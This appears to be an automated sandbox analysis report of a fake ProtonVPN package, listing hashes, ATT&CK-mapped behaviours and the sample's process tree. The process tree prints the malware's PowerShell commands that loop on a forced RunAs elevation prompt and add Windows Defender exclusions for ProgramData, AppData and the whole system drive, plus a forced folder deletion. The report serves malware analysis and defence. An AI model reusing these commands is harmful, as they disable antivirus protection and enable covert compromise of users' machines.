Overview
overview
10Static
static
3ProtonVPN-...er.dll
windows11-21h2-x64
1ProtonVPN-...er.exe
windows11-21h2-x64
10ProtonVPN-...OV.ps1
windows11-21h2-x64
3ProtonVPN-...er.dll
windows11-21h2-x64
1ProtonVPN-...er.exe
windows11-21h2-x64
8ProtonVPN-...AR.exe
windows11-21h2-x64
4ProtonVPN-...er.dll
windows11-21h2-x64
1ProtonVPN-...er.exe
windows11-21h2-x64
8ProtonVPN-...et.exe
windows11-21h2-x64
3Analysis
-
max time kernel
32s -
max time network
145s -
platform
windows11-21h2_x64 -
resource
win11-20240802-fr -
resource tags
arch:x64arch:x86image:win11-20240802-frlocale:fr-fros:windows11-21h2-x64systemwindows -
submitted
07-08-2024 18:56
Static task
static1
Behavioral task
behavioral1
Sample
ProtonVPN-10_11/Launcher.dll
Resource
win11-20240802-fr
Behavioral task
behavioral2
Sample
ProtonVPN-10_11/Launcher.exe
Resource
win11-20240802-fr
Behavioral task
behavioral3
Sample
ProtonVPN-10_11/data/appInfo/nRCRxIB7aYOV.ps1
Resource
win11-20240802-fr
Behavioral task
behavioral4
Sample
ProtonVPN-10_11/data/appInfo/services/Launhcer.dll
Resource
win11-20240802-fr
Behavioral task
behavioral5
Sample
ProtonVPN-10_11/data/appInfo/services/Launhcer.exe
Resource
win11-20240802-fr
Behavioral task
behavioral6
Sample
ProtonVPN-10_11/data/appInfo/services/WinRAR.exe
Resource
win11-20240802-fr
Behavioral task
behavioral7
Sample
ProtonVPN-10_11/data/appInfo/services/data/Launcher.dll
Resource
win11-20240802-fr
Behavioral task
behavioral8
Sample
ProtonVPN-10_11/data/appInfo/services/data/Launcher.exe
Resource
win11-20240802-fr
Behavioral task
behavioral9
Sample
ProtonVPN-10_11/data/appInfo/services/wget.exe
Resource
win11-20240802-fr
General
-
Target
ProtonVPN-10_11/data/appInfo/services/Launhcer.exe
-
Size
364KB
-
MD5
e5c00b0bc45281666afd14eef04252b2
-
SHA1
3b6eecf8250e88169976a5f866d15c60ee66b758
-
SHA256
542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903
-
SHA512
2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387
-
SSDEEP
6144:+pS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYql6wrEJWPYg:+p8KLBzQ7Lcf3SiQs2FTTql9unNrkv75
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid Process 2984 powershell.exe 568 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Launhcer.exepowershell.exeLauncher.exepowershell.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Launhcer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Launcher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid Process 2984 powershell.exe 2984 powershell.exe 568 powershell.exe 568 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2984 powershell.exe Token: SeDebugPrivilege 568 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
Launhcer.exepowershell.exeLauncher.exedescription pid Process procid_target PID 3844 wrote to memory of 2984 3844 Launhcer.exe 77 PID 3844 wrote to memory of 2984 3844 Launhcer.exe 77 PID 3844 wrote to memory of 2984 3844 Launhcer.exe 77 PID 2984 wrote to memory of 5060 2984 powershell.exe 79 PID 2984 wrote to memory of 5060 2984 powershell.exe 79 PID 2984 wrote to memory of 5060 2984 powershell.exe 79 PID 2984 wrote to memory of 5060 2984 powershell.exe 79 PID 2984 wrote to memory of 5060 2984 powershell.exe 79 PID 5060 wrote to memory of 568 5060 Launcher.exe 80 PID 5060 wrote to memory of 568 5060 Launcher.exe 80 PID 5060 wrote to memory of 568 5060 Launcher.exe 80 PID 5060 wrote to memory of 1572 5060 Launcher.exe 82 PID 5060 wrote to memory of 1572 5060 Launcher.exe 82 PID 5060 wrote to memory of 1572 5060 Launcher.exe 82
Processes
-
C:\Users\Admin\AppData\Local\Temp\ProtonVPN-10_11\data\appInfo\services\Launhcer.exe"C:\Users\Admin\AppData\Local\Temp\ProtonVPN-10_11\data\appInfo\services\Launhcer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Users\Admin\AppData\Local\Temp\ProtonVPN-10_11\data\appInfo\services\data\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\ProtonVPN-10_11\data\appInfo\services\data\Launcher.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT4⤵
- System Location Discovery: System Language Discovery
PID:1572
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ac4917a885cf6050b1a483e4bc4d2ea5
SHA1b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
SHA256e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
SHA512092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d
-
Filesize
16KB
MD554e6233b455317b511b7833b2d817de7
SHA17c25d9b07c1efb5737f46e4483e278c4ffaea7e1
SHA256b34361b26795cf072bdfe4e50d30f993e59207dc52602b04928139cb2950340f
SHA5122e91d765009f07c9c0f8f79d248945481c2b69ea97f88ae6e04e636e799174277fa31456ea989e2a11033b7f7debb7ccc5a2baeef2303992afada26883e477b8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82